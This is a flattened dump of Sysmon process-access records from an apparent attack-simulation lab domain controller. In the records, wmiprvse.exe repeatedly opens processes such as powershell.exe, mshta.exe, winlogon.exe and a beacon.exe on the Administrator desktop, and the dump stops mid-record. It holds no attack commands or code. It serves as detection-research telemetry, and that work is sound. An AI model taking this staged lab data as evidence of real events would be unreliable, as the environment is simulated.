10341000x80000000000000001697692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program 